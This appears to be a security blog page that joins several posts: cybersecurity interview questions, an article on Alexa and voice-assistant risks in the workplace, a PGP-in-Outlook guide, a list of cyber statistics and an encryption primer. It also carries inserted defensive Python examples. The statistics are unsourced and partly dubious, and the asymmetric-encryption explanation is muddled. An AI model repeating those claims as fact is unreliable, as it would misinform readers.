
Vulnerability assessment is an approach used to find flaws in an application or network, whereas penetration testing is the practice of finding and exploiting vulnerabilities the way a real attacker would. VA is like travelling over the surface, whereas PT is digging into it for gold.

17. What are the objects that should be included in a good penetration testing report?

A VAPT report should have an executive summary explaining the observations at a high level, along with the scope and the period of testing. This can be followed by the number of findings, split by severity into high, medium and low. Each finding should then be described in detail, with replication steps, proof-of-concept screenshots and the recommended remediation.

18. What is compliance?

Abiding by a set of standards set by a government, an independent body or the organisation itself. E.g. any organisation that stores, processes or transmits payment card data needs to comply with PCI DSS (Payment Card Industry Data Security Standard). Other examples include an organisation complying with its own policies.

19. Tell us about your Personal achievements or certifications?

Keep this simple and relevant; earning a security certification can be one personal achievement. Explain how it started, what kept you motivated, how you feel now and what your next steps are.

20. Various response codes from a web application?

1xx - Informational responses
2xx - Success
3xx - Redirection
4xx - Client side error
5xx - Server side error


21. When do you use tracert/traceroute?

When you can't reach the final destination (ping fails), tracert/traceroute shows each hop the packets pass through and where the path stops, which tells you whether the break is at a firewall, a router or the ISP.

22. DDoS and its mitigation?

DDoS stands for distributed denial of service: a network, server or application is flooded with more requests than it is designed to handle, making it unavailable to legitimate requests. The requests come from many unrelated sources (typically a botnet), hence "distributed". It can be mitigated by analysing and filtering the traffic in scrubbing centres: centralised data-cleansing stations where the traffic to a website is analysed and the malicious traffic is removed before the rest is forwarded on.

23. What is a WAF and what are its types?
TIP: This topic is usually not asked in detail.

WAF stands for web application firewall. It protects an application by inspecting HTTP requests and filtering malicious traffic (SQL injection, XSS and the like) from legitimate traffic. A WAF can be an appliance or software deployed in front of the application, or a cloud-based service that the traffic is routed through.

24. Explain the objects of Basic web architecture?
TIP: Different organisations follow different models and networks. BE GENERIC.

A basic web architecture should contain a front ending server, a web application server, a database server.

Level 03 - Master (Entered into a managerial position or sitting for one)

25. How often should Patch management be performed?

Patches should be applied as soon as practical after release, following a proper patch management process (test, deploy, verify). Microsoft releases Windows patches on the second Tuesday of the month (Patch Tuesday); they should be applied to all machines within a month, and sooner for vulnerabilities that are being actively exploited. The same goes for network devices: patch as soon as a fix is released.

26. How do you govern various security objects?

Various security objects are governed with the help of KPIs (key performance indicators). Take the example of Windows patching: the agreed KPI could be 99%, meaning that 99% of the PCs have the latest or last month's patch level. Other security objects can be managed along similar lines.

27. How does a Process Audit go?

The first thing to do is to identify the scope of the audit, followed by obtaining the document that describes the process. Study the document carefully and then identify the areas which you consider weak. The company might have compensating controls in place; verify that they are enough.

28. What is the difference between policies, processes and guidelines?

A security policy defines the security objectives and the security framework of an organisation. A process (or procedure) is a detailed step-by-step document that specifies the exact actions needed to implement a security mechanism. Guidelines are recommendations which can be customised and used in the creation of procedures.

29. How do you handle AntiVirus alerts?

Check the AV policy and then the alert. If the alert is for a legitimate file it can be whitelisted; if it is a malicious file it should be quarantined or deleted. The file's hash can be checked for reputation on sites such as VirusTotal. The AV also needs to be fine-tuned so that the number of alerts is reduced.

30. What is a false positive and false negative in case of IDS?

When the device generates an alert for an intrusion which has actually not happened, this is a false positive; if the device has not generated any alert and the intrusion has actually happened, this is a false negative.


31. Which one is more acceptable?

False positives are more acceptable. False negatives will lead to intrusions happening without getting noticed.

32. Software testing vs. penetration testing?

Software testing just focuses on the functionality of the software and not the security aspect. A penetration testing will help identify and address the security vulnerabilities.

33. What are your thoughts about Blue team and red team?

Red team is the attacker and blue team the defender. Being on the red team seems fun but being in the blue team is difficult as you need to understand the attacks and methodologies the red team may follow.

34. What is you preferred - Bug bounty or security testing?

Both are fine, just support your answer like Bug Bounty is decentralised, can identify rare bugs, large pool of testers etc.

35. Tell us about your Professional achievements/major projects?

This can be anything like setting up your own team and processes or a security practice you have implemented. Even if the achievement is not from a security domain just express it well.

36. 2 quick points on Web server hardening?
TIP: This is a strong topic, get over with the exact answer and carry on the conversation over the lines.

Web server hardening is the removal of unnecessary services running on various ports and of default test scripts from the servers. Web server hardening is a lot more than this, and organisations usually have a customised checklist for hardening their servers. Any server that is created has to be hardened, and the hardening has to be re-confirmed on a yearly basis. Even the hardening checklist has to be reviewed yearly for new additions.

37. What is data leakage? How will you detect and prevent it?

A data leak is when data gets out of the organisation in an unauthorised way. Data can be leaked in various ways – emails, prints, lost laptops, unauthorised upload of data to public portals, removable drives, photographs, etc. Various controls can be put in place to ensure that data does not leak; a few are restricting uploads to internet websites, using an internal encryption solution, restricting mail to the internal network, restricting the printing of confidential data, etc.

Level 04 - Grandmaster (Senior management roles)

38. What are the different levels of data classification and why are they required?

Data needs to be segregated into various categories so that its severity can be defined; without this segregation, a piece of information may be critical for one person but not so critical for others. There can be various levels of data classification, varying from organisation to organisation, but in broad terms data can be classified into:

  • Top secret – Its leakage can have a drastic effect on the organisation, e.g. trade secrets.

  • Confidential – Internal to the company, e.g. policies and processes.

  • Public – Publicly available, like newsletters.
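The data-leakage controls from question 37 and the classification levels above fit together naturally: an outbound mail check can use the label on a message to decide whether it may leave the organisation. The following is an added example, not from the original page; the internal domain, the policy (confidential and above never goes to external recipients, unlabelled data to outsiders is queued for human review) and the sample messages are all constructed.

```python
"""Outbound e-mail check driven by classification labels.

Added example, not from the original page. The domain, policy and
sample messages are constructed for illustration.
"""
import re

INTERNAL_DOMAIN = "example.com"  # constructed: the organisation's own mail domain

# Higher rank = more sensitive. Labels are looked up in subject and body.
RANK = {"TOP SECRET": 3, "CONFIDENTIAL": 2, "PUBLIC": 1}
LABEL_RE = re.compile(r"\b(TOP SECRET|CONFIDENTIAL|PUBLIC)\b", re.IGNORECASE)


def classify(text):
    """Return the most sensitive label found in the text, or None if unlabelled."""
    labels = {m.group(1).upper() for m in LABEL_RE.finditer(text)}
    return max(labels, key=RANK.get) if labels else None


def is_external(address):
    """True when the recipient's domain is not the organisation's own."""
    return address.rsplit("@", 1)[-1].lower() != INTERNAL_DOMAIN


def decide(msg):
    """Return (verdict, reason): 'allow', 'block', or 'review' (needs a human)."""
    label = classify(msg["subject"] + "\n" + msg["body"])
    external = [r for r in msg["to"] if is_external(r)]
    if not external:
        return "allow", "all recipients internal"
    if label is None:
        return "review", "unlabelled data to external recipients"
    if RANK[label] >= RANK["CONFIDENTIAL"]:
        return "block", f"{label} data to external recipients {external}"
    return "allow", "public data"


# Constructed sample traffic.
SAMPLE_MESSAGES = [
    {"to": ["bob@example.com"], "subject": "CONFIDENTIAL: policy draft", "body": "..."},
    {"to": ["partner@other.org"], "subject": "Q3 plan", "body": "This is CONFIDENTIAL."},
    {"to": ["me@mail.example.net"], "subject": "formula", "body": "Top Secret recipe attached"},
    {"to": ["customer@other.org"], "subject": "PUBLIC newsletter", "body": "Hello!"},
    {"to": ["friend@other.org"], "subject": "spreadsheet", "body": "see attached"},
]


def run(messages=SAMPLE_MESSAGES):
    """Verdict for each sample message, in order."""
    return [decide(m)[0] for m in messages]


if __name__ == "__main__":
    for m in SAMPLE_MESSAGES:
        print(decide(m), m["to"], m["subject"])
```

The "review" verdict is the important design choice: a rule that only matches explicit labels will miss unlabelled data, so anything unlabelled that leaves the network is routed to a person rather than silently allowed.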

39. In a situation where a user needs admin rights on his system to do daily tasks, what should be done – should admin access be granted or restricted?

Users are usually not given admin access, to reduce risk, but in certain cases they can be granted it. Just ensure that the users understand their responsibility in case any incident happens. The access should be provided only for a limited time, after senior management approval and with a valid business justification.

40. What are your views on usage of social media in office?
TIP: Keep an open mind with these kinds of questions.

Social media is acceptable; just ensure content filtering is enabled and upload features are restricted. Read-only mode is acceptable as long as it does not interfere with work.


41. What are the various ways by which the employees are made aware about information security policies and procedures?

There can be various ways in which this can be done:

  • Employees should undergo mandatory information security training after joining the organisation. This should be repeated on a yearly basis, and can be either a classroom session followed by a quiz or an online training.

  • Sending out notifications on a regular basis in the form of slides, one-pagers, etc. to ensure that employees are kept aware.

42. In a situation where both open source software and licensed software are available to get the job done, which should be preferred and why?
TIP: Think from a security perspective and not from the functionality point of view.

For an enterprise, it is better to go for the licensed version of the software, as most such software carries a licence clause that it may be used for individual but not commercial purposes. Plus, the licensed version is kept updated and is easy to track in an organisation. It also helps clients develop confidence in the organisation's software and practices.

43. When should a security policy be revised?

There is no fixed time for reviewing the security policy, but it should be done at least once a year. Any changes made should be documented in the document's revision history and version number. In case of major changes, the users need to be notified as well.

44. What all should be included in a CEO level report from a security standpoint?

A CEO level report should be no more than 2 pages and should contain:

  1. A summarised picture of the state of security structure of the organisation.

  2. Quantified risk and ALE (Annual Loss Expectancy) results along with countermeasures.

45. How do you report risks?

Risk can be reported, but it needs to be assessed first. Risk assessment can be done in 2 ways: quantitative analysis and qualitative analysis. This approach caters to both technical and business audiences. Business people can see the probable loss in numbers, whereas technical people see the impact and frequency. Depending on the audience, the risk can be assessed and reported accordingly.
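The ALE figures mentioned in question 44 and the quantitative/qualitative split in question 45 can be produced from the same inputs. The following is an added example, not from the original page: it uses the standard definitions SLE = asset value × exposure factor and ALE = SLE × ARO, rates a countermeasure by its net annual benefit (ALE before minus ALE after minus control cost), and maps the same risk onto a 3×3 likelihood/impact matrix for a technical audience. The scenario, thresholds and money figures are constructed.

```python
"""Quantitative and qualitative views of one risk, for two audiences.

Added example (not from the original page). Formulas are the standard
ones: SLE = asset value x exposure factor, ALE = SLE x ARO. All figures
and thresholds below are constructed for illustration.
"""
from dataclasses import dataclass


@dataclass
class Risk:
    name: str
    asset_value: float      # value of the asset at risk, in currency units
    exposure_factor: float  # fraction of the asset lost per incident (0..1)
    aro: float              # annualised rate of occurrence (incidents per year)

    @property
    def sle(self) -> float:
        """Single loss expectancy: loss from one incident."""
        return self.asset_value * self.exposure_factor

    @property
    def ale(self) -> float:
        """Annual loss expectancy: expected loss per year."""
        return self.sle * self.aro


@dataclass
class Countermeasure:
    name: str
    annual_cost: float   # yearly cost of running the control
    residual_ef: float   # exposure factor once the control is in place
    residual_aro: float  # ARO once the control is in place


def residual_risk(risk: Risk, cm: Countermeasure) -> Risk:
    """The same risk, re-estimated with the control in place."""
    return Risk(risk.name, risk.asset_value, cm.residual_ef, cm.residual_aro)


def countermeasure_value(risk: Risk, cm: Countermeasure) -> float:
    """Net annual benefit: ALE before - ALE after - cost of the control.
    A positive number means the control pays for itself."""
    return risk.ale - residual_risk(risk, cm).ale - cm.annual_cost


def qualitative_rating(risk: Risk) -> str:
    """Likelihood x impact on a 3x3 matrix (bucket thresholds are constructed)."""
    likelihood = 1 if risk.aro < 0.1 else 2 if risk.aro < 1 else 3
    impact = 1 if risk.exposure_factor < 0.1 else 2 if risk.exposure_factor < 0.5 else 3
    score = likelihood * impact
    return "Low" if score <= 2 else "Medium" if score <= 4 else "High"


def report(risk: Risk, cm: Countermeasure, audience: str) -> dict:
    """'business' readers get money figures; anyone else gets frequency,
    impact and the qualitative rating before and after the control."""
    after = residual_risk(risk, cm)
    if audience == "business":
        return {"risk": risk.name, "ale_before": risk.ale, "ale_after": after.ale,
                "control": cm.name, "net_annual_benefit": countermeasure_value(risk, cm)}
    return {"risk": risk.name, "frequency_per_year": risk.aro,
            "impact_fraction": risk.exposure_factor,
            "rating_before": qualitative_rating(risk),
            "rating_after": qualitative_rating(after), "control": cm.name}


# Constructed scenario: ransomware on a customer database.
DB_RANSOMWARE = Risk("Customer DB ransomware", asset_value=1_000_000,
                     exposure_factor=0.3, aro=0.5)
OFFLINE_BACKUPS = Countermeasure("Offline backups + restore drills",
                                 annual_cost=20_000, residual_ef=0.05, residual_aro=0.5)

if __name__ == "__main__":
    for audience in ("business", "technical"):
        print(audience, report(DB_RANSOMWARE, OFFLINE_BACKUPS, audience))
```

Note that the backup control in the scenario does not change the ARO (the attack is just as likely) but cuts the exposure factor; the two views make that visible in different ways: the business view shows the ALE dropping, the technical view shows the likelihood bucket unchanged and the impact bucket falling.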

46. What is an incident and how do you manage it?

Any event which leads to compromise of the security of an organisation is an incident. The incident process goes like this:

  • Identification of the Incident

  • Logging it (Details)

  • Investigation and root cause analysis (RCA)

  • Escalation or keeping the senior management/parties informed

  • Remediation steps

  • Closure report.

47. Is social media secure?
TIP: This is another debatable question but be generic.

Whether the data is secure or not is uncertain, but users can take steps from their end to stay safe:

  • Connect with trusted people

  • Do not post/upload confidential information

  • Never use the same username and password for all accounts

48. Chain of custody?

For legal cases the integrity of the data/device (evidence) needs to be preserved, hence any access needs to be documented – who, what, when and why. Compromise of this process can cause legal issues for the parties involved.
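A simple way to keep the who/what/when/why record itself trustworthy is to hash the evidence at acquisition and chain every access entry to the previous one, so that a later edit to any entry (or to the evidence) is detectable. The following is an added example, not from the original page; the evidence bytes, names and incident reference are constructed.

```python
"""A tamper-evident chain-of-custody log: who, what, when, why.

Added example, not from the original page. Each entry carries the hash of
the previous entry (the first carries the evidence hash), so verify()
detects both an altered evidence file and an altered log entry. All data
below is constructed.
"""
import hashlib
import json
from datetime import datetime, timezone


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class CustodyLog:
    def __init__(self, evidence_id: str, evidence: bytes):
        self.evidence_id = evidence_id
        self.evidence_hash = sha256_hex(evidence)  # taken at acquisition time
        self.entries = []

    def record(self, who: str, what: str, why: str, when: str = None) -> str:
        """Append one access entry and return its hash."""
        prev = self.entries[-1]["entry_hash"] if self.entries else self.evidence_hash
        entry = {
            "who": who, "what": what, "why": why,
            "when": when or datetime.now(timezone.utc).isoformat(),
            "prev_hash": prev,
        }
        entry["entry_hash"] = sha256_hex(json.dumps(entry, sort_keys=True).encode())
        self.entries.append(entry)
        return entry["entry_hash"]

    def verify(self, evidence: bytes) -> list:
        """Return a list of problems; an empty list means the chain is intact."""
        problems = []
        if sha256_hex(evidence) != self.evidence_hash:
            problems.append("evidence bytes differ from acquisition hash")
        prev = self.evidence_hash
        for i, entry in enumerate(self.entries):
            body = {k: v for k, v in entry.items() if k != "entry_hash"}
            if entry["prev_hash"] != prev:
                problems.append(f"entry {i}: broken link to previous entry")
            if sha256_hex(json.dumps(body, sort_keys=True).encode()) != entry["entry_hash"]:
                problems.append(f"entry {i}: contents changed after recording")
            prev = entry["entry_hash"]
        return problems


def demo():
    """Build a three-entry log, then simulate an undocumented edit."""
    evidence = b"constructed disk image bytes"
    log = CustodyLog("LAPTOP-0001-IMG", evidence)  # constructed evidence id
    log.record("a.analyst", "acquired image", "incident IR-42 (constructed)",
               "2018-03-01T09:00:00+00:00")
    log.record("a.analyst", "sealed in evidence bag", "transfer to lab",
               "2018-03-01T09:30:00+00:00")
    log.record("b.examiner", "read-only mount for analysis", "malware triage",
               "2018-03-02T10:00:00+00:00")
    intact = log.verify(evidence)
    log.entries[1]["who"] = "someone.else"  # rewrite history without re-recording
    tampered = log.verify(evidence)
    return intact, tampered


if __name__ == "__main__":
    print(demo())
```

In practice the log would be stored separately from the people who handle the evidence and the entry hashes signed or written to append-only storage; the hash chain only makes edits visible, it does not prevent them.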

49. How should data archives be maintained?

Gone are the days when files and cabinets held data over the years. That phase was followed for a long time by archiving data on magnetic tapes and storing the tapes, which adds overhead for the maintenance and safety of the tapes. These are the conventional approaches, but the world is gradually moving to cloud storage. The only hurdle is data privacy: companies are not very sure about handing over critical data. This will take time, but a securely configured and managed cloud can be one of the best options.

50. What are your thoughts on BYOD?

There is no correct answer for this but just ensure that whatever side you are on, justify it with examples, scenarios and logic.

Cyber Security Interview Questions - Topic wise split

Although there is no defined scope or end to the questions, having a strong foundation in the basic concepts and awareness of the latest trends will give you an upper hand in the interview.


  • BACKUP your answers with examples wherever possible.

  • Provide DETAILS, this will leave less chance for the interviewer to dig into details.

  • BE PRECISE in what you say, LISTEN carefully, THINK and ANSWER.

  • BE CONFIDENT with what you speak.

  • MAINTAIN a good posture.

  • BE AWARE about the security news, recent incidents, attacks etc.

  • Remember the question and answer accordingly; DO NOT deviate from the topic.

  • Most importantly “KEEP A POSITIVE ATTITUDE” even if the interview is not going as you expected.

  • Sometimes the interview is deliberately conducted that way to test your attitude.

Not to be missed: to be in top shape for your cybersecurity interview, being a certified ethical hacker is an essential hiring criterion.



Oh Alexa, you are the weakest link

Alexa Mishap Hints at Potential Enterprise Security Risk

When Alexa mailed a copy of a couple's conversation to a contact, it raised warning flags for security professionals in organizations.

News this week that an Amazon Echo device had recorded a family's conversation and emailed it to a seemingly random person on their contact list sent a chill among consumers who are adopting these types of Internet of Things devices.

Amazon was able to explain the sequence of events that led to the unfortunate security breach, but many consumers remain skittish about the new voice assistant sitting in their living rooms. Consumers aren't the only ones with a reason to ask questions, however. A growing number of enterprise applications, including SAP and, have been the target of Echo integration through "skills" - or tasks - that tie Alexa's voice recognition to the application.

According to analysts at, in January 2018 there were more than 25,700 skills published in the US. While the vast majority of these are skills for consumer-oriented integration like smart house control, a quick look in the Amazon Alexa Skills Market shows more than 1,000 business skills listed.

"There is a big push by Amazon and other large vendors to incorporate voice assistants into business applications. Voice assistants are a way for vendors to introduce their layer of AI to existing apps and business process," says Chris Morales, head of security analytics at Vectra.

According to Ovum Research, virtual digital assistants will outnumber humans on earth by 2021. Many of them will inevitably join humans in the workplace. As voice assistant use in business is growing, IT security professionals are beginning to pay attention to the devices and their impact on enterprise IT. 

According to Amazon, the Alexa residential data leak came through an almost comical combination of over-sensitive listening device and ignored voice prompts. The consumers spoke strings of sounds that the Echo interpreted as a call to wake up and then various commands, while the humans in the room never heard the Echo's request for confirmation and instruction. Nevertheless, many breaches are built on a foundation of unlikely, yet possible, sequences so the security industry is taking note of the case.

In April, Amazon closed a vulnerability that allowed an Echo to surreptitiously send a transcript of overheard speech to a developer. And in 2017, Google issued a patch for a hardware problem that left a small number of Home Minis constantly recording the speech around them. All of this is interesting, but why should enterprise IT security pros care?

Alexa Goes to Work

A growing number of skills and integrations are being introduced for voice assistants in the office. From Echo integration with Atlassian Build Meister, which lets developers check on build status with their voice, to skills for Slack that let you collaborate with co-workers without ever touching a keyboard, voice assistants are becoming part of many developer and operations offices.

In addition, skills for applications like SAP Concur,, and Oracle, seem likely to increase voice assistant use beyond the technical teams to employees in various business units with widely differing technology knowledge and skill sets.

With these integrations, one of the concerns some security professionals have is the lack of a direct tie between device and user. "With voice assistants the action or information that is collected needs to be audited and tracked to a single user, which is a must-have for enterprise adoption. So effectively we need a strong voice match to a user so that we can associate an action to a user," says Rishi Bhargava, co-founder of Demisto.

That association has more implications for enterprise applications than for most collaboration systems. "The most obvious problem I already see is the lack of voice recognition to a specific user, in particular with Alexa. How do you manage authentication in a conversational interface?" asks Morales.

Vocal Dangers

So what, really, are the dangers of voice assistants in the enterprise? We've seen the possibility of a voice assistant misinterpreting voice commands (or random words interpreted as voice commands) to record and send information out of the organization. That possibility has already been shown in demonstrations of exploits that could be used against a company.

Chinese researchers demonstrated that inaudible commands can trigger Siri to act in an exploit they call "Dolphin Attack." This is a specific instance of exploiting a simple fact about the microphones in voice assistants: They can hear a much wider range of frequencies than can humans.

A significant concern comes with the possibility of a headlong rush into voice assistants in the workplace. "Most companies should be cautiously evaluating the use and potential before implementing any voice system into major systems. There needs to be a period of testing and security validation or a business runs the risk of creating a new attack surface they are not prepared to deal with," says Morales.

Bhargava agrees with the idea of cautiously proceeding, but is less optimistic that it will happen. "Security is always an afterthought. This is no different for the voice assistants. In most cases, the adoption will be organic and at some point, the security teams will evaluate and put controls."

One of the greatest conveniences of voice assistants is that they're always there, listening, and ready to respond. So it seems like a paradox to say that one of the greatest security practices is to turn off the microphone. In effect, that means if the individual using the device is leaving for the day, or for an extended period of time, they should turn off the microphone or turn off the device.

Employees should also be made aware, through signage or training, that a listening device is in the office with them. Just as employees have had to be trained not to respond to phishing emails and to follow privacy regulations in communications, the advent of the voice assistant means that IT security has a new area of training to develop and manage for the organization.

Now, if only Alexa could be trained to deliver the classes for them.



How to Encrypt Emails Using PGP (GPG) in Outlook

How to Encrypt Emails Using PGP (GPG) in Outlook 2016

Edward Snowden is a polarizing public figure, but regardless of how you feel about the man or what he did, the knowledge that the federal government had basically declared open season on all communications between citizens, and had begun gathering and storing all personal emails, phone call records, text messages, etc. was a sudden revelation. Furthermore, it was revealed that the U.S. government either had--or was asking for--a backdoor into every major Internet and technology provider, including Google, Microsoft, Yahoo, and Apple. The most recent public fight between Apple and the FBI over the government wanting a backdoor into breaking into an iPhone has sparked an intense debate over security versus the nanny state, and prompted the Facebook-owned WhatsApp to deploy end-to-end encryption of all messages on their service.

Paranoia aside, it's important to know that privacy violations can occur, as can the theft of intellectual property and research. With that in mind, it is just as important to know how to implement and use encrypted email. Unfortunately, such a task often seems furthest outside the wheelhouse of Windows users (Linux people can always drop into a command line and use the powerful tools provided there).

Getting Around the Software

The first thing you need to do is install Gpg4win. This is a Windows distribution of several GPG tools. GPG (GnuPG) itself is a GNU-licensed implementation of the OpenPGP standard, which is an open version of PGP, a data encryption and decryption program that is the gold standard for email.

With the alphabet soup out of the way (and Gpg4win installed), create your public and private keys using the Kleopatra app that was installed:

File => New Certificate

Choose the option to create a personal OpenPGP key pair. Type in your name and your email, then continue. It will reflect your information back to you, and then you can create your key.

The key creation will ask for a passphrase, so be sure to use an actual passphrase you can remember, but not a password that you use for every Internet account you create. You will also be prompted for an expiration if you should choose to add one.

Once that is created, you will have the option to export your keys locally. For the sake of getting around the program a little more, just finish the key creation and ignore this for now.

Kleopatra will show you your certificate in the open window. If you right click on it, you'll see several options, including "export certificates," "export secret keys," and "export certificates to server." Choosing the first option will allow you to download your public key, which is what you will need others to have in order to decrypt your emails. The second option will allow you to download your private key, which you should do, and store in a safe place--perhaps on a USB drive in a safe. Be sure to check the box for ASCII armor. The last option will upload your public key to an Open PGP compliant server. This will make it easier for people to send encrypted emails to you, as they should be able to pull your public key from the server instead of you sending it to them.

Microsoft Outlook

Gpg4win comes with a GpgOL Outlook plugin, but unfortunately, as of this writing, it does not seem to work with Outlook 2016. Instead, get the latest Outlook Privacy Plugin, and use that. Installation is straightforward, and when done, you'll have an "Add-ins" ribbon on your Outlook, and an Open PGP section on your email messages.

Receiving Email

Receiving email is easy. If someone sends you an encrypted email (and correctly uses your public key), when that message comes in, and you double-click on it, you'll be prompted for the passphrase you used when you created your key. Once authenticated, it will decrypt the message.

Sending Email

In order to send email, you will need the recipient's public key. You can get this in two ways: from the person themselves, or from a server. In the case of the latter, click "Lookup server certificates" in Kleopatra, enter the person's email address, and search for it. If it finds the person's certificate, you can click on it and hit "Import." With the former, you'll need the person to send you their public key (some people post it online). Save this data to disk, then click "Import certificates" and choose the file you just saved.

With the certificate installed, you can create a new email message, then before sending, click on the "Encrypt" toggle on the Open PGP section. When you go to send the message, it'll encrypt it first. If you do not have the person's certificate installed, it'll prompt you with a window from which to select recipients whose keys you do have.

Fingerprint verification

Sometimes you need to verify that the key you have installed is the actual key of the person to whom you wish to send a message. A lot of people use the key fingerprint for this. In Kleopatra, if you right-click on a certificate and choose "Certificate Details," you'll see an entry for Key-ID and Fingerprint. Some people use either one as a short identifier for themselves, whether in email signatures or Twitter descriptions. You simply match the supplied one against the one Kleopatra is showing you, and if it matches, you have the correct pairing. This isn't to say that you can be sure the other person is authentically who they claim to be, but it is an added layer of protection.
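It helps to know what Kleopatra is actually showing you in that dialog. The following is an added example, not from the original page or from Gpg4win: it derives a version 4 OpenPGP fingerprint and Key-ID the way RFC 4880 section 12.2 specifies (SHA-1 over 0x99, a two-octet length and the public-key packet body; the Key-ID is the low 64 bits of the fingerprint) and shows a comparison that tolerates the spacing and case differences you meet when copying identifiers from a signature or a web page. The key material is tiny and constructed purely to show the derivation.

```python
"""How an OpenPGP v4 fingerprint and Key-ID relate, and how to match them.

Added example, not from the original page. Follows RFC 4880 section 12.2.
The modulus below is a constructed 64-bit number, NOT a real key; real
keys are thousands of bits long, but the derivation is identical.
"""
import hashlib
import struct


def mpi(value: int) -> bytes:
    """Multi-precision integer: 2-octet bit count, then big-endian bytes."""
    bits = value.bit_length()
    return struct.pack(">H", bits) + value.to_bytes((bits + 7) // 8, "big")


def v4_public_key_body(created: int, n: int, e: int, algorithm: int = 1) -> bytes:
    """Version 4 public-key packet body for an RSA key (algorithm id 1):
    version, 4-octet creation time, algorithm, then the MPIs n and e."""
    return b"\x04" + struct.pack(">I", created) + bytes([algorithm]) + mpi(n) + mpi(e)


def fingerprint(body: bytes) -> str:
    """SHA-1 over 0x99 || 2-octet body length || body, as 40 upper-case hex digits."""
    digest = hashlib.sha1(b"\x99" + struct.pack(">H", len(body)) + body).hexdigest()
    return digest.upper()


def key_id(fp: str) -> str:
    """Long Key-ID: the last 16 hex digits (64 bits) of the fingerprint."""
    return fp[-16:]


def pretty(fp: str) -> str:
    """gpg/Kleopatra-style grouping: 10 groups of 4, a wider gap in the middle."""
    groups = [fp[i:i + 4] for i in range(0, 40, 4)]
    return " ".join(groups[:5]) + "  " + " ".join(groups[5:])


def matches(shown_fp: str, supplied: str) -> bool:
    """Compare what Kleopatra shows with what the other person published
    (a full fingerprint or a 16-digit Key-ID), ignoring spacing and case."""
    shown = shown_fp.replace(" ", "").upper()
    given = supplied.replace(" ", "").upper()
    if len(given) == 40:
        return given == shown
    if len(given) == 16:
        return given == key_id(shown)
    return False  # anything shorter is not enough to identify a key


# Constructed key material (NOT a real key): 64-bit modulus, e = 65537,
# creation time 2018-01-01T00:00:00Z as a Unix timestamp.
DEMO_BODY = v4_public_key_body(created=1514764800, n=0xC3B8E1A5D7F92B4D, e=65537)
DEMO_FP = fingerprint(DEMO_BODY)

if __name__ == "__main__":
    print("Fingerprint:", pretty(DEMO_FP))
    print("Key-ID:     ", key_id(DEMO_FP))
```

Because the creation time is part of the hashed packet, two keys with identical RSA parameters but different creation times have different fingerprints; and because the Key-ID is just the tail of the fingerprint, matching on the full fingerprint is always the stronger check.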

A good resource in email self-defense can be found at the Free Software Foundation's web site. It'll go through GPG installation and encrypted email sending for Linux, Windows, and Mac. For Windows, it walks you through using the Thunderbird mail client with the Enigmail plugin, which is another reason why this blog post deals with Outlook.



11 Cyber Security Fact and Stats

11 Alarming Cyber Security Facts and Stats

  1. There is a hacker attack every 39 seconds, affecting one in three Americans each year.

  2. 95 percent of breached records came from three industries in 2016: Government, retail, and technology.

  3. 43 percent of cyber attacks target small business. 64% of companies have experienced web-based attacks. 62% experienced phishing & social engineering attacks. 59% of companies experienced malicious code and botnets and 51% experienced denial of service attacks.

  4. The average cost of a data breach will exceed $150 million by 2020, as more business infrastructure gets connected.

  5. Since 2013, 3,809,448 records have been stolen from breaches every day: 158,727 per hour, 2,645 per minute and 44 every second of every day.

  6. Over 75% of the health care industry has been infected with malware over the last year.

  7. Large-scale DDoS attacks were up 140 percent in 2016’s fourth quarter.

  8. Cybersecurity Ventures reportedly estimates that the global cybersecurity space will grow at a CAGR of 9.8% from around $106.3 billion in 2015 to around $170.2 billion by 2020. Approximately $1 trillion is expected to be spent globally on cybersecurity from 2017 to 2021.

  9. More than 209,000 cybersecurity jobs in the U.S. are unfilled, and postings are up 74% over the past five years. Unfilled cybersecurity jobs will reach 1.5 million by 2019.

  10. The risk is real with IoT, and it's growing. According to figures compiled in a recent Symantec Internet Security Threat Report, there are 25 connected devices per 100 inhabitants in the US, and 50 to 200 billion connected devices are expected by 2020.

  11. Only 38 percent of global organizations claim they are prepared to handle a sophisticated cyberattack.

If any of the items listed impact you, contact IDSS for resolution.

Comparing Common Encryption


An algorithm is basically a procedure or a formula for solving a problem, in this case the problem of data snooping. An encryption algorithm is a set of mathematical procedures for performing encryption on data. Through the use of such an algorithm, information is transformed into ciphertext, and a key is required to transform the data back into its original form. This brings us to the concept of cryptography, which has long been used for information security in communication systems.

Cryptography is a method of using advanced mathematical principles to store and transmit data in a particular form so that only those for whom it is intended can read and process it. Encryption is a key concept in cryptography: it is a process whereby a message is encoded in a format that cannot be read or understood by an eavesdropper. The technique is old and was first used by Caesar to encrypt his messages with the Caesar cipher. Plaintext from a user can be encrypted to ciphertext and then sent through a communication channel, and no eavesdropper can read the plaintext. When it reaches the receiving end, the ciphertext is decrypted to the original plaintext.

Cryptography Terms

  • Encryption: It is the process of locking up information using cryptography. Information that has been locked this way is encrypted.
  • Decryption: The process of unlocking the encrypted information using cryptographic techniques.
  • Key: A secret like a password used to encrypt and decrypt information. There are a few different types of keys used in cryptography.
  • Steganography: It is actually the science of hiding information from people who would snoop on you. The difference between steganography and encryption is that the would-be snoopers may not be able to tell there’s any hidden information in the first place.

Symmetrical Encryption

This is the simplest kind of encryption, involving only one secret key to cipher and decipher information. Symmetric encryption is an old and well-known technique. It uses a secret key that can be a number, a word or a string of random letters. The key is blended with the plaintext of a message to change the content in a particular way. The sender and the recipient must both know the secret key that is used to encrypt and decrypt all the messages. Blowfish, AES, RC4, DES, RC5 and RC6 are examples of symmetric encryption. The most widely used symmetric algorithms are AES-128, AES-192 and AES-256.

The main disadvantage of the symmetric key encryption is that all parties involved have to exchange the key used to encrypt the data before they can decrypt it.

Asymmetrical Encryption

Asymmetric encryption, also known as public key cryptography, is a relatively new method compared to symmetric encryption. Asymmetric encryption uses two keys to encrypt plaintext. Secret keys are exchanged over the Internet or a large network, and it ensures that malicious persons do not misuse the keys. It is important to note that anyone with a secret key can decrypt the message, which is why asymmetric encryption uses two related keys to boost security. A public key is made freely available to anyone who might want to send you a message. The second, private key is kept secret so that only you know it.

A message that is encrypted using the public key can only be decrypted using the private key, and conversely a message encrypted using the private key can be decrypted using the public key. Security of the public key is not required because it is publicly available and can be passed over the Internet. Asymmetric keys give far stronger assurance of the security of information transmitted during communication.

Asymmetric encryption is mostly used in day-to-day communication channels, especially over the Internet. Popular asymmetric key encryption algorithms include ElGamal, RSA, DSA, elliptic curve techniques and PKCS.

Asymmetric Encryption in Digital Certificates

To use asymmetric encryption, there must be a way of discovering public keys. One typical technique is the use of digital certificates in a client-server model of communication. A certificate is a package of information that identifies a user and a server. It contains information such as the organization’s name, the organization that issued the certificate, the user’s email address and country, and the user’s public key.

